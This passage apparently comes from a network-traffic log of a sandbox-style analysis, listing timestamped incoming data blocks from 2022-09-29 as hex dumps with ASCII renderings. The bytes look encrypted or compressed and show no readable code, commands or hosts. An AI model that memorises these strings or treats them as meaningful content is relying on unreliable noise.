                                                                                                                                                2022-09-29 12:49:27 UTC7372INData Raw: 42 31 34 12 ff 6e 11 05 37 72 d5 f8 a4 86 38 8d 4e 37 e1 72 fa 52 29 00 46 14 3c 6a 1e ad f5 08 c6 cc 5d 07 1f 2b aa 8c 35 09 a7 02 d3 1d 5e 51 c2 af 8b 19 5f 32 50 71 73 cd f7 6b 73 fd b8 0d 79 20 38 3e 1a 17 4d 1a fe 9c 39 5b ff 21 f3 22 f6 f5 a1 4a df eb 9c 74 80 c0 9a 55 62 36 46 80 83 5f b7 b7 b7 60 c8 c2 5d df ed 34 1f 2f aa 0d 16 fe 15 89 54 17 47 fb ed 88 07 93 ea eb 44 aa 7b 75 d4 d5 66 cf cb 09 08 2e fc 8e 48 ab e3 1c 8b 46 e6 e0 a9 73 e0 f8 d9 90 12 cf c8 34 8b 24 5b 33 b0 72 c2 3d 74 d7 88 9a 03 23 2c 60 72 0a 91 6a 2e bb b1 66 70 d1 fd 8b 6d 72 3a 04 9b 53 4a 35 ec 06 3a c1 e7 b8 15 32 47 9e 13 2a 28 42 2b 35 2f a6 f9 77 30 64 61 48 08 07 46 a1 ea 42 51 0d a9 dc 1e e0 c1 86 ca f2 fb 4f d9 8e 93 1d 41 f1 d6 59 48 21 ce 96 38 ea b0 ef c8 dc 19
                                                                                                                                                Data Ascii: B14n7r8N7rR)F<j]+5^Q_2Pqsksy 8>M9[!"JtUb6F_`]4/TGD{uf.HFs4$[3r=t#,`rj.fpmr:SJ5:2G*(B+5/w0daHFBQOAYH!8
                                                                                                                                                2022-09-29 12:49:27 UTC7388INData Raw: 09 2f 34 19 1c fb 1a 50 8f ec 39 15 f5 dc f1 29 89 b3 9d 37 78 22 56 60 51 e3 67 18 68 b4 70 08 8d 2a 0e f8 1b c8 71 ec 5a a8 ed 10 89 55 51 73 58 3f bc a2 c1 7b 02 25 48 12 7c a4 df a4 2f d9 b8 7a 8c 78 e8 e3 9c 3f 9d 63 73 d2 a0 21 99 64 37 ff dc bd 57 80 3b 9b 11 20 61 a7 16 29 6f 0b 44 42 73 33 48 a2 5c 55 71 98 ef a7 13 87 89 67 06 6a 25 3a 99 e0 c5 3e 6f 3b 02 5e a1 17 1f 98 48 62 50 06 1c cb 10 e8 5b 9e 94 35 55 71 78 6e 23 cd 1f 04 69 1a 4f c7 92 27 46 35 57 72 ba be fb 1a 98 aa 69 b7 20 d0 2b c2 9a 6a 2d 4d 25 31 d2 db 0d 86 a9 70 65 23 55 d7 83 72 22 3f 5b 6f bd 2a 25 0f 72 d6 e0 50 b6 84 0a bb e6 02 2a 3b 84 d2 80 3c af 4c 69 a3 96 04 3f 7b a6 01 75 a0 31 18 be 9c 98 14 18 55 38 7e 5c 72 fb c2 c9 cf 87 9c 9e 0c c6 17 b3 60 94 7e 0b a5 2e 5b f7
                                                                                                                                                Data Ascii: /4P9)7x"V`Qghp*qZUQsX?{%H|/zx?cs!d7W; a)oDBs3H\Uqgj%:>o;^HbP[5Uqxn#iO'F5Wri +j-M%1pe#Ur"?[o*%rP*;<Li?{u1U8~\r`~.[
                                                                                                                                                2022-09-29 12:49:27 UTC7404INData Raw: 5a 8a 90 77 0e 64 d4 9a 3d 91 a8 84 53 90 ff de 24 59 77 82 3a 59 04 88 92 cc 25 25 7c 82 2e 46 ca 3b c6 4b 4a 8a 93 f1 49 02 35 af fa f0 be 26 9c f8 d6 e6 f4 e4 95 fa de 4b e8 98 9a 03 89 53 da 9d d5 5d 02 cb 1e 3b f0 25 22 7c 65 89 69 e5 8a c0 8b 0e c2 e1 5d 3d 91 a1 e5 38 66 d6 21 80 eb aa 3d df 60 d4 48 ab 2d 90 fd 27 40 8e f6 e8 77 4c 4e 41 4e 91 94 91 ed ec b3 dd 94 6e ea b5 0f 93 c1 7e 2b d4 c3 2b 93 a4 10 0b 1d de 77 f5 79 8d 5e 70 37 fe 98 89 a7 8a 4b d9 ef bc 32 1d 18 52 c0 0d 4d 6c 47 a9 a0 53 0a d7 5c 90 f1 79 87 a8 38 5b 7b 5a ed 09 ad 43 1b 0d 46 59 d3 4c f3 9d 29 39 96 28 1f d1 5d df 29 d9 51 15 b0 5e 98 b6 ca 94 4f 0e df d6 03 bd 64 b4 cd 7b 12 5d 86 6b 9e 2a a0 b5 9a 3c 4a 02 97 d6 fe 4f 60 d0 23 19 c5 11 be ef ba 61 71 24 e5 a0 7f 74 69
                                                                                                                                                Data Ascii: Zwd=S$Yw:Y%%|.F;KJI5&KS];%"|ei]=8f!=`H-'@wLNANn~++wy^p7K2RMlGS\y8[{ZCFYL)9(])Q^Od{]k*<JO`#aq$ti
                                                                                                                                                2022-09-29 12:49:27 UTC7420INData Raw: ff 70 0a 82 58 4b 6d 4c 89 e8 b6 da 32 ec e9 9a 30 04 68 e6 5c 0b ba 9c d5 ef 7c a0 c5 8f d2 c0 dc 9d 10 5d 22 03 92 6a b8 46 dd cd 7b 06 09 7d 38 0a 03 c6 62 6f 92 d9 22 62 0b 35 25 7b 67 d1 0e 84 cf 21 94 f5 1c 3b 2d b3 36 6a 2f d7 8c b3 76 85 38 56 54 a4 78 3d 55 83 11 a4 83 b1 de 8c 03 49 f7 7a 83 c0 1e 21 c4 63 75 e0 7c 9a d0 21 e4 4a 13 1d d5 70 0b cc 3e f8 f9 8c ca 8b f2 8b 64 d8 0f ce 41 23 bf 11 23 73 fa 3d a4 60 93 ef 77 18 32 20 44 b8 88 9b 3e 9b cb b6 18 b5 9a 81 57 a7 ec 43 76 66 a9 04 97 93 a3 c8 16 ab fd c7 bf 11 d7 ff 72 6e 70 ca 20 72 a1 03 b6 e3 8b 37 c3 1b 5e 42 16 ea 74 0a 10 0e dc 53 fc e9 40 ff 5d c1 a0 1f ec f8 63 2f 73 1c 93 3a 93 61 35 af b6 b3 4e 33 02 40 12 16 5a c7 7c 43 35 bd 78 5e f7 e9 5a 67 46 5e 26 57 65 83 46 a0 80 ed dc
                                                                                                                                                Data Ascii: pXKmL20h\|]"jF{}8bo"b5%{g!;-6j/v8VTx=UIz!cu|!Jp>dA##s=`w2 D>WCvfrnp r7^BtS@]c/s:a5N3@Z|C5x^ZgF^&WeF
                                                                                                                                                2022-09-29 12:49:27 UTC7436INData Raw: 74 3a d4 73 a1 49 94 38 c3 a5 44 68 97 14 9f a3 bb 24 fd 1b b4 cf 67 2d f6 45 ff cc 20 c2 fd e2 67 59 b0 4f 48 a0 db c3 b3 5e 18 ce 4f 0b 00 6a c3 27 ad 36 6e 39 ed 3f 5b 7a c3 4c 85 db 2a 18 17 e3 f3 47 c7 12 4d a7 92 4d 2c a2 48 dd 82 0c 75 d2 4e de a2 7f ea f1 78 d7 05 07 50 2f fd 0e bf cf b0 bb ff 64 60 b6 85 fb b4 c7 69 3c 22 f0 db b4 cc f2 3a c0 c6 06 8e b2 41 1d d1 4e fe eb bc 68 d4 55 89 a6 6e 7e 2b af 52 71 d1 fb 02 7b 99 79 28 45 ac 3b 50 97 63 a4 5e 3c 61 32 01 79 4d 69 26 9e 8f c0 fe b2 1c c2 2d 47 c4 31 6d 10 aa c3 8c d7 e0 9b 99 75 00 88 93 af 26 2d be a3 d0 6e a5 c7 a7 8a e4 88 76 50 2c 00 c1 fc 9b 99 4d 88 b7 d0 ce cc ce d5 4b cb 2b f2 8d 51 6f 32 aa 00 c4 99 98 f9 84 64 e2 ff 68 b3 cd 56 6d 62 e0 37 6f b4 ff 01 10 ec 8e b1 cd 79 78 3f 24
                                                                                                                                                Data Ascii: t:sI8Dh$g-E gYOH^Oj'6n9?[zL*GMM,HuNxP/d`i<":ANhUn~+Rq{y(E;Pc^<a2yMi&-G1mu&-nvP,MK+Qo2dhVmb7oyx?$
                                                                                                                                                2022-09-29 12:49:27 UTC7452INData Raw: 18 e4 9f 79 ed 50 42 82 50 6b 7b 01 f8 92 9a 6e e5 2e e8 33 1f 36 a6 19 77 9d f9 f8 e4 b3 e2 e9 c7 3a 4b c0 d0 ed 92 ac b9 0e 34 4f 9d 8e 87 48 51 8a d1 3c 0d cb f0 57 72 aa 88 3d 76 0f c3 bb 0f 0b 4f 5c 9f d1 37 cf a9 59 80 34 02 35 a0 99 8d be f1 de 4a f2 05 5e 8a 64 ce 74 9e 2a 4b 15 c5 ca f0 f7 f7 14 20 4d ad 5b ac 2f 09 29 66 82 a3 8e 3c 32 35 49 f5 e1 65 ad ab e0 fc 52 fc 05 65 fc 24 68 02 ff 8c 80 6f a6 97 ad f1 c9 b6 8a 7b 4d e6 6d b9 95 cb 04 05 5b 0e 1c d1 a8 0d cc 52 87 23 45 0b d8 80 cb 8b 47 03 0f 90 9c df 7a c0 09 13 d4 d3 b3 fe 40 fb 6f 47 b6 9b 73 c9 7c c7 db 15 2a d6 f3 73 f9 1e 29 20 eb 94 54 44 fb c4 17 7c f3 e4 f8 c7 62 24 64 7c 29 df 03 83 c6 49 67 0a 7b 62 ab bf 0c 0c 38 ba ad f7 17 b0 6e c9 92 6c c1 33 e4 2f 52 6e 96 4b 43 dc f9 81
                                                                                                                                                Data Ascii: yPBPk{n.36w:K4OHQ<Wr=vO\7Y45J^dt*K M[/)f<25IeRe$ho{Mm[R#EGz@oGs|*s) TD|b$d|)Ig{b8nl3/RnKC
                                                                                                                                                2022-09-29 12:49:27 UTC7468INData Raw: 97 d1 4f 00 56 11 1d 6a 41 9f e2 55 24 81 7d a8 67 5a 6c 7f cc c7 b9 08 77 9a 2a 8b f9 87 63 f0 13 0d 02 eb 1a 66 a4 7e 47 27 8a 73 ba 4d f6 2b d0 af 55 73 ca e6 2e 3b cc 74 df 8c 86 fa 11 fe f9 89 1f 01 c4 dd 68 6f c9 27 2e 22 d3 36 c0 d0 ad d3 db da 20 81 f0 32 4e fa 81 d3 ea bc b4 e0 51 9b 3c c0 d8 22 54 0b fd 5f 9c de 75 80 95 78 5d ea f5 74 ec 5b 71 9a fc cd 4d 73 1c 4c 6a 65 aa c4 82 76 b9 a5 97 78 1c 59 ca 6f df d0 a1 3c f5 e1 bb 56 8f c8 2a d6 8b 21 e1 65 e3 fd 1e 71 41 99 43 7f 06 f3 a2 e2 49 4b 23 e9 ed ca 25 27 0a 30 27 dc f2 85 b0 15 54 c3 3f a8 5a 0b b1 80 38 0b 43 58 06 26 17 0b 0a ca 78 6e 20 4b c2 9f 15 0b df 50 b5 7e 5f 25 72 b3 24 96 67 70 0a cd 75 b0 1e e0 63 2d 62 3c e2 d5 e5 cf 20 ce 75 08 d0 ac c7 c9 af fc ba f3 1c bb 1f f6 e9 03 27
                                                                                                                                                Data Ascii: OVjAU$}gZlw*cf~G'sM+Us.;tho'."6 2NQ<"T_ux]t[qMsLjevxYo<V*!eqACIK#%'0'T?Z8CX&xn KP~_%r$gpuc-b< u'
                                                                                                                                                2022-09-29 12:49:27 UTC7480INData Raw: 73 e9 69 05 cf ca 3f f1 d2 bf ed 70 62 f2 de d6 a7 3d f1 b7 a5 ed a0 c5 b5 5f e3 52 77 1b cc 5b 6e 60 e0 77 a1 91 84 ea c6 4d 1c f9 e3 81 f8 a6 da 85 5d 61 1d 4f a0 9e 72 37 07 30 18 4d c2 37 c6 9a 74 ec 6e 8d 8b 3e 47 6b 06 e9 4b 86 2c c7 a4 eb e4 b6 63 7b 9b 0a da 57 28 59 20 d5 d0 36 0f 52 ea f5 85 55 56 72 d9 16 b0 0a e3 5e 22 dd 43 d2 ca 48 f8 ee c6 e4 17 9e dc 7d f0 a2 a0 b6 f8 29 27 75 a0 34 13 1e 0e 48 68 bd f9 9e ce de a7 1b 14 22 0d 6a d9 a9 fe 0e d4 45 c3 4c 25 ee dd 51 e4 10 6c cd 85 d3 b5 3c 22 8d 97 10 04 8f 03 d2 b3 2c a0 aa 28 2e 18 2f ce 81 54 44 92 12 a9 f3 d2 7d d4 3b a4 fc 4f d5 a9 65 04 7c c6 0d 08 b3 7a b8 12 10 f5 ce 43 84 74 84 69 5d 86 04 00 6a 6f 6b 05 12 92 a3 a3 6f 42 3b b4 05 fe 01 23 1e 21 d4 5a 10 27 34 ae c9 50 46 94 8d 13
                                                                                                                                                Data Ascii: si?pb=_Rw[n`wM]aOr70M7tn>GkK,c{W(Y 6RUVr^"CH})'u4Hh"jEL%Ql<",(./TD};Oe|zCti]jokoB;#!Z'4PF
                                                                                                                                                2022-09-29 12:49:27 UTC7496INData Raw: 9c ed 7b 3f 16 62 74 02 b8 5c 52 85 27 8c a9 30 2e cb cb c8 0a d0 f9 34 58 ea 34 14 f2 24 0b 55 14 3c a3 31 c2 56 18 dc d6 45 30 e0 85 2b cf f6 10 00 8e 20 00 1e 1a 19 b9 52 c8 4b 22 11 e0 3b 3f c5 3c 83 16 cf de b5 ef 60 d6 f7 f9 4f da 54 98 d3 42 43 f2 8f 45 ce d4 4f 0a 5d 2e 95 51 d2 b8 71 ea af c2 db a4 86 29 13 a2 25 90 b5 aa 4c 3e c5 9a 08 df da 63 c8 a3 82 7f 01 b6 f7 cb c8 35 14 9c e1 ff 89 f5 1d 3b 57 8b 33 04 8f fc e8 50 61 f2 37 44 60 2d b2 a0 4a db 6d 3b 55 99 6e 47 b6 6b f9 d2 72 8a 55 03 41 20 63 7f b7 6d 9d fb 3c 7d 54 3c f5 1b 5b bd 95 a9 74 8c f5 7a 29 3d 81 eb 74 bf dc d8 8b ac 49 5e dc fd 23 bb d4 02 50 cb 80 ff 6c e9 92 9f 26 c4 d3 82 f9 58 18 ea be 49 cd e9 12 69 b5 18 6e 1d 81 f5 a5 9d 92 b5 17 91 db 1a 43 20 98 df c6 50 f6 6f 03 69
                                                                                                                                                Data Ascii: {?bt\R'0.4X4$U<1VE0+ RK";?<`OTBCEO].Qq)%L>c5;W3Pa7D`-Jm;UnGkrUA cm<}T<[tz)=tI^#Pl&XIinC Poi
                                                                                                                                                2022-09-29 12:49:27 UTC7512INData Raw: 0e 6f b0 fe 95 5a 13 e7 b9 cf 93 65 27 b1 82 18 60 3e 75 61 73 5f 8e 63 a4 fd e0 05 02 81 c7 02 85 7e d8 b8 c4 81 e9 c4 9f fb dc e1 45 7d 5d ad 73 4c 5e 1a 47 2d 5c 72 13 26 90 c0 7d 1a 7b bc a6 04 ba 7a a1 d3 be 8f 88 2e b9 0d 0d 9d a5 74 de 14 3a 2a b5 2e cb 9f 25 e0 e8 54 ab a9 10 a5 f1 99 e8 58 22 00 4f 5f 5f 66 77 d6 ea da 80 01 bb 0e 55 8e 31 9b fc 93 79 11 3e 86 80 bb 08 5f 5d 72 50 fb 71 9e 5d be 60 69 f6 98 96 e2 d7 8c f4 4a be 04 54 c3 17 b5 0c cf 47 a4 20 e0 e7 12 dd a5 b3 d3 da 5b 76 c4 c4 81 32 2a c6 41 95 a5 87 7a b7 bd f8 c7 11 62 4b 96 47 81 14 66 fa 7d 9d cb 60 6b 62 06 8f 21 05 d3 50 6a a0 6b c8 7f 6d 6a d7 4d 41 7a 53 53 d6 e8 14 97 77 f3 fe d7 95 1e 99 be 37 95 7c 83 a4 71 42 d5 50 b6 c6 c1 0b 9a 66 9f 74 81 60 12 51 9a e8 05 64 16 95
                                                                                                                                                Data Ascii: oZe'`>uas_c~E}]sL^G-\r&}{z.t:*.%TX"O__fwU1y>_]rPq]`iJTG [v2*AzbKGf}`kb!PjkmjMAzSSw7|qBPft`Qd
                                                                                                                                                2022-09-29 12:49:27 UTC7528INData Raw: 63 b2 d5 f8 4f 41 9a 86 2f 87 b0 46 f4 ba 91 94 f6 d8 ef 6c a3 67 be e5 b6 0e 41 60 64 b1 0e 56 7c e9 9e ff 9b 87 20 e4 5e 91 76 5a bc 13 00 81 90 2a 56 f4 32 a3 d2 6e b9 c0 95 c5 00 87 ff b2 b5 22 6b 09 8d 91 5f 87 60 f1 41 6c 88 a7 e9 e9 55 89 4d 22 04 9b 1e 00 58 22 ce b1 96 4c cf 92 4a 09 1a a0 0b 1a 8d d3 cd b0 a4 bc 4a 89 5e 75 83 85 e3 ff c5 fc 7b 78 ae 7b dc 4a 4a 91 7b f7 a7 c8 c0 18 8b 5b 05 90 ff 90 bf 06 d9 7d ce bb 58 c2 11 ed c0 46 1c 46 ff 03 4e cd 26 d0 33 b0 55 38 db b6 35 04 f7 a2 73 d6 d2 57 36 c5 7c 7a 10 24 29 52 ac 7c 03 03 29 c0 19 c3 ca 6d da 5b fc 83 6e f7 23 7e 63 f1 5a 60 3f d6 4d 27 dc 8d 32 eb f0 ca 77 bf d9 a0 38 d9 49 fa 08 eb 05 83 81 28 37 24 d5 86 03 a0 a1 59 2d 54 53 a0 61 a8 d2 dc 2a cb 9d da 1c 0d ad 87 a1 e2 6a 9b fb
                                                                                                                                                Data Ascii: cOA/FlgA`dV| ^vZ*V2n"k_`AlUM"X"LJJ^u{x{JJ{[}XFFN&3U85sW6|z$)R|)m[n#~cZ`?M'2w8I(7$Y-TSa*j
                                                                                                                                                2022-09-29 12:49:27 UTC7544INData Raw: 96 f3 5e 9e 20 78 32 70 ca 26 e5 c2 0a 52 b9 91 b1 08 8d 1a 30 fb 96 e8 70 85 32 a9 8b a6 9c 12 87 9e 26 23 d2 2f be e7 9a 28 92 71 d3 c8 b7 3c 4e 79 32 c8 ff 8d 62 af f6 77 64 66 a1 2d ec 61 ac a3 3c dd ea 4c 07 b1 50 05 cd a9 7b 5f b1 e5 f3 83 dd 4e 45 1d af 97 95 21 f7 48 b7 15 16 34 10 ae b7 8c 84 0f d3 9e b3 49 63 5a 55 f6 91 91 1e dc f1 4a 3d ed 61 a8 dc d6 82 20 33 ff c9 5d 25 a2 e5 69 bb 56 72 a4 b3 29 0f 0c 2e 10 33 f1 1a 28 c8 96 97 8d 33 74 8e 3c e5 d9 5a 7c a7 02 c3 36 49 b3 9e af 65 73 59 ba a3 77 9d e3 81 47 eb 5f f0 0d ab ea 79 a7 0d 2f 23 24 61 fb a9 d2 92 7d c8 e7 87 f9 60 8a b3 00 7c 50 5b 2d 23 37 fe 83 34 4f 9a d8 7b e1 18 68 13 a2 16 ae 61 67 22 e1 d2 56 cb 18 33 70 01 53 31 c4 f3 5c a0 e0 8b 03 7a 2b 73 5d d1 3f bf d6 0d 8a 98 38 a1
                                                                                                                                                Data Ascii: ^ x2p&R0p2&#/(q<Ny2bwdf-a<LP{_NE!H4IcZUJ=a 3]%iVr).3(3t<Z|6IesYwG_y/#$a}`|P[-#74O{hag"V3pS1\z+s]?8
                                                                                                                                                2022-09-29 12:49:27 UTC7560INData Raw: c2 af 5a c7 58 2b a1 cf ba e2 f8 4e cc 2e 95 a4 74 de 48 18 33 bc 8b 8f cb 3f 00 d5 18 01 e5 61 08 d9 db 56 96 aa 8a 67 47 85 94 32 5f 17 d8 70 03 ec 2f c6 28 fa e0 72 e9 67 3f 54 de 3c 23 42 36 20 6d 9c c8 22 c5 7e 57 de 6a b6 52 5d d8 7d 31 e5 48 61 e8 cc b1 ef fb f9 2f 74 26 45 46 7b 8d 1a d6 88 3c 92 c1 5b e3 6f 67 8a d9 a8 28 ae 2f fa bc e0 05 67 a7 1f 9a f0 84 53 34 dd 29 42 c3 49 5a 56 79 91 7e f0 33 68 04 2c 9e ce 91 0e 80 99 f7 d4 a1 b1 c0 b1 bd ba 70 6f 9d f3 30 5a 31 32 58 df 30 1b 68 0b 9b ff 1e 18 a2 de 3b 03 99 2e 59 ff 90 b7 97 9c 24 08 80 bb 38 2e 69 e8 2e 79 d8 42 32 4b 97 e5 8d c6 5e 89 bc 45 ee 70 35 6d 98 e8 6e f4 f6 69 74 9b 3d 3c ce 9d d2 d9 6f 0d 88 a2 3e d5 cf 77 77 d7 53 a2 23 d2 d2 46 74 fc 4e 7d 08 1f ae 19 b4 41 e4 fe 17 8d 82
                                                                                                                                                Data Ascii: ZX+N.tH3?aVgG2_p/(rg?T<#B6 m"~WjR]}1Ha/t&EF{<[og(/gS4)BIZVy~3h,po0Z12X0h;.Y$8.i.yB2K^Ep5mnit=<o>wwS#FtN}A
                                                                                                                                                2022-09-29 12:49:27 UTC7576INData Raw: cf 16 8f 11 0e 05 9d cb 5b 88 4c dc 7d c5 d9 91 f9 ff d6 1d 9d b3 3d 4f 8d 30 58 aa a3 eb 63 41 dd 41 4f c7 47 42 95 42 49 f5 af b2 3d a1 1c f2 04 a1 68 21 e8 75 47 79 13 4a 40 6f 12 1b ab 49 a9 84 c4 11 b7 fd 8d 6d be 8b 62 e3 c1 22 ac 6e 22 db df f1 21 54 1e b3 5c 65 36 7d 53 71 75 23 ef 74 96 a2 8f ba 8b f4 81 e6 26 2f 7c 5d 6a 68 1a a0 f8 bf 0f 0a ed 71 b7 4f b6 22 55 48 73 59 66 1d 9d 71 bb 18 26 17 eb a4 78 65 55 07 7b 01 85 00 07 39 ea 92 25 af 28 23 41 97 30 37 41 bb 0b 19 ea e7 c9 70 3c c3 28 97 e8 0d 95 43 68 a9 c8 54 ff 5d 51 8b 7f 45 b2 e1 58 27 97 43 ab 7b aa 82 b8 bd df 07 f6 68 2b 85 47 76 4f 31 17 4e 46 7d 18 bc 48 d8 c6 18 50 49 aa 71 9e fc 8d 79 2d e6 67 e1 c5 d0 66 bb 1e ab b5 fd cd 82 8d f1 f0 da 98 54 22 60 dd 1a 4d 53 14 1b 2c 65 4c
                                                                                                                                                Data Ascii: [L}=O0XcAAOGBBI=h!uGyJ@oImb"n"!T\e6}Squ#t&/|]jhqO"UHsYfq&xeU{9%(#A07Ap<(ChT]QEX'C{h+GvO1NF}HPIqy-gfT"`MS,eL
                                                                                                                                                2022-09-29 12:49:27 UTC7592INData Raw: 31 3a 4c 87 d6 6c a9 0a 19 de 25 af f0 00 af 8b b4 86 a1 6f fe 9f 82 08 68 9f ed f8 b0 ab d2 ff 5d 29 59 37 60 f0 09 51 a0 5f be 98 09 1b 55 fc 37 8a 72 8e 3a 60 ca cc 03 9c dc 06 36 ea 06 df e5 ab af 99 36 89 e2 53 2c bb af c3 1c 0e 38 0b 1f 40 3d a2 07 0a 3e bf 5a 21 21 5d 0d 69 2c 54 97 1e 02 b4 11 94 8b 26 85 ac 3e 5a 4f b3 9a 76 dd 89 c8 b6 ef c4 53 d6 3c f4 b8 13 0b 12 a4 aa 37 d8 92 a6 b7 4f 54 43 47 88 1f a1 d1 95 1e d5 a9 96 46 0b 2b 4e bd cd da 50 fa c5 46 61 59 ba 1e db 85 d5 d6 ae 5a be 48 20 bd 2d 64 f1 87 60 33 93 60 b7 8b 08 a3 15 0d e2 14 4f f9 c5 48 44 ba 55 02 7c a8 09 f0 3a 67 ec a2 44 49 53 62 19 00 e1 34 ea a4 57 ac ac c8 89 00 4b 6d 93 bb 5c ad 86 da 08 f4 2a 8a 68 b6 51 67 ae 57 0b ca c7 b6 70 7b 49 cd 15 8e a6 02 c4 69 d4 71 60 93
                                                                                                                                                Data Ascii: 1:Ll%oh])Y7`Q_U7r:`66S,8@=>Z!!]i,T&>ZOvS<7OTCGF+NPFaYZH -d`3`OHDU|:gDISb4WKm\*hQgWp{Iiq`
                                                                                                                                                2022-09-29 12:49:27 UTC7608INData Raw: 02 8a aa 67 8c 69 20 e4 2f 3b aa 71 cc 70 fc aa a3 dc 95 68 1f 75 9d 30 fa 12 4f 6e 9e 86 89 40 a8 b8 9e d7 fc 0d 3e d1 e7 0a 65 fa ba 7a dc 7a 80 92 13 30 f5 69 43 05 b9 0a 5b c9 42 8d 22 9c e6 5d 54 19 36 04 f3 f2 43 ce c8 11 2c ce 7b 51 42 2e a7 ca 1a 35 64 5a 42 48 f9 bb 90 01 00 0d a3 f0 63 56 66 dd 30 82 ea 9f 7b 74 17 c4 80 59 a9 6b 81 9c 40 33 a7 1c c2 d5 20 4a ef e2 a0 ba d4 9a 4b 63 f5 67 8e 4a 8a 00 25 ef 44 bb e0 86 d7 81 17 29 54 b7 eb 80 d5 4c f8 f8 cc 5c 16 95 81 0e 8d af 1e 07 c5 8e 89 e9 c2 83 a1 19 e0 16 0b 49 a4 12 e3 c1 83 aa ea 9f 14 a8 2f 63 dd 74 47 97 cc 85 54 dd 09 93 88 ef 42 4a f0 34 03 d8 1c 3b 02 7f ed 48 3d 8d c8 ca 73 39 cb 3a dd ac a4 2e c1 6a 50 9f 0e 9b 17 de 44 a4 dd 81 4e 0a 5f af cf e6 f8 6e ce 4e fd a6 60 d0 da de d1
                                                                                                                                                Data Ascii: gi /;qphu0On@>ezz0iC[B"]T6C,{QB.5dZBHcVf0{tYk@3 JKcgJ%D)TL\I/ctGTBJ4;H=s9:.jPDN_nN`
                                                                                                                                                2022-09-29 12:49:27 UTC7624INData Raw: 6b f9 1e dd 3a 52 d6 5c 4a 9b 81 8f bf d9 19 33 d6 cb 42 19 a5 de eb 72 ae 2a f0 99 bc 1a 64 87 6b 82 10 dc b5 cb 1a 76 ba 00 3d 52 17 12 0b b0 25 2a 44 52 15 76 eb a0 de ca 22 d4 4c b4 ed 36 b2 0b 0a 6d b5 c3 14 34 3b a2 1b bd e2 0b d6 c9 6e 24 1f 51 cb 10 27 1f f3 c8 65 5b 9c 16 31 6c 67 0a a5 34 59 28 bd 6e ae 0c 7c 66 da 2c b9 d0 93 a1 eb b6 8c f5 cc 70 c5 12 0d e2 76 5a 4d 27 25 9e bc 15 2b a9 bc dc 37 d1 da 0c da c1 4e 4f 05 15 07 93 12 c4 81 75 ca f2 73 8a 48 ed 3f 95 cf 5b 79 3c db b4 ff 77 8e 8e 72 48 00 a5 40 af 62 0a 5e 69 5b 9a 39 da 50 4a 57 5b 95 ff e5 e6 07 29 e6 9e d9 d7 ed e5 bf 73 b0 f4 65 72 67 c3 91 85 8f 03 65 77 c9 7b ed 92 38 7f c7 d9 bc d2 05 5d 5d ca cd ea ab d4 ef 68 9c 74 6d 8e 3a 52 1b 9b 9a ec f7 a6 f6 ca 00 d1 60 48 dd ad 3a
                                                                                                                                                Data Ascii: k:R\J3Br*dkv=R%*DRv"L6m4;n$Q'e[1lg4Y(n|f,pvZM'%+7NOusH?[y<wrH@b^i[9PJW[)sergew{8]]htm:R`H:
                                                                                                                                                2022-09-29 12:49:27 UTC7640INData Raw: 56 bd e5 a5 7a 73 15 11 19 e4 01 e8 25 2b 9e f0 57 53 49 fd ab 87 c0 a6 67 2f 73 14 e0 d7 60 40 9f 09 c1 bf ec b6 89 26 11 a5 50 c6 d6 07 30 20 b0 b4 b4 46 c8 aa 39 b2 3b 5e 06 17 96 a5 cd 2d 1e 47 83 2d 29 7e 7a 06 57 10 32 66 d3 c2 e4 51 cb d1 34 c5 7b db 1a 7c a9 90 03 5a 9a 43 ec 75 c7 12 76 13 48 54 91 ca c6 5c 84 42 38 26 8e 4b d6 06 d6 34 e7 61 12 05 03 7e 0e a5 cc 4b bc 58 e5 dd 23 53 08 55 23 20 40 d3 dc 74 cf b4 c0 6e 8f 71 88 a7 15 a8 fb a0 5d 16 15 6a e4 bb f1 98 23 81 35 dd af 2b 8d 45 41 c1 2c 38 3a 1d 6e dd 52 a8 34 b5 66 f0 95 3b fa f6 26 c4 3d 07 24 28 14 f1 78 c6 da d5 3a 38 93 ac 33 d6 16 2e 9d 0c 86 f8 fa 48 60 47 1d 0f 78 d8 de ed 07 02 5f 4d f0 a1 11 25 0e 30 8d ec ca 9b 77 77 04 0e 4a 34 33 c3 e3 50 e1 db cb 52 59 6c 8c a7 a4 f1 ee
                                                                                                                                                Data Ascii: Vzs%+WSIg/s`@&P0 F9;^-G-)~zW2fQ4{|ZCuvHT\B8&K4a~KX#SU# @tnq]j#5+EA,8:nR4f;&=$(x:83.H`Gx_M%0wwJ43PRYl
                                                                                                                                                2022-09-29 12:49:27 UTC7656INData Raw: 40 43 77 c0 cb fb 4c e5 70 d2 c1 11 78 b2 a9 e1 24 83 85 93 58 19 8d 63 d0 97 87 33 23 b7 0f c4 fa 3a 0f 1f fa 95 7b f2 d9 ab 76 42 45 76 6d db 40 bc bf 7e 9a 3d f0 e6 64 52 59 5d 41 54 4a 0b 82 b0 2b 25 ff 82 7a 55 23 3a 3b 01 4e 1b f3 6f f4 6b 3a b4 d4 d6 8d f4 10 c6 7e 2e 53 17 7c dd d9 61 15 8c c3 35 54 a5 cd 44 89 df 6a 9f 1f 2b 32 a5 af 66 e8 28 2f 30 02 ef 07 d8 d0 5d a0 67 89 3a 21 5e 65 98 bf 85 aa 32 7e 8c 69 13 46 b4 04 54 64 bf db 0a 2c 3e 80 51 27 41 81 90 09 d5 79 35 5d 44 a4 56 04 0f f7 b4 76 0a 3a 49 92 d2 ec 4e d0 c7 19 d4 e5 a5 f6 28 10 6c 2b 5c 41 a3 c7 c1 0a 20 c1 c1 ca 4e 13 49 95 29 2b ce 40 29 88 54 a5 d8 6c 7c 19 30 ad 37 09 ac 81 8a 43 f7 e7 f6 e4 d8 f0 6f 50 1b 31 72 40 ec 08 0d 3a 22 99 d2 32 4b 41 b4 a1 e9 69 ff 71 30 9f 88 33
                                                                                                                                                Data Ascii: @CwLpx$Xc3#:{vBEvm@~=dRY]ATJ+%zU#:;Nok:~.S|a5TDj+2f(/0]g:!^e2~iFTd,>Q'Ay5]DVv:IN(l+\A NI)+@)Tl|07CoP1r@:"2KAiq03
